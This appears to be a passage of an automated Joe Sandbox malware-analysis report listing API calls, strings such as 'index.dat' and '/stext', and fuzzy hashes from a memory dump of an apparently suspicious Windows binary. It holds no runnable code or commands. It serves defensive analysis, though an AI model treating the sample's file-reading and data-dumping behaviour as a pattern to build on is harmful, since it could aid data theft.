Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
APIs
Strings
• failed memory resize %u to %u bytes, xrefs: 00415358
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: realloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 471065373-2134078882
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
APIs
• memset.MSVCRT ref: 0041BDDF
• memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
• API String ID: 1381354015-0
APIs
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
                                                                                                                                                • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004301AD
                                                                                                                                                • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1297977491-0
                                                                                                                                                • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859505661-0
                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
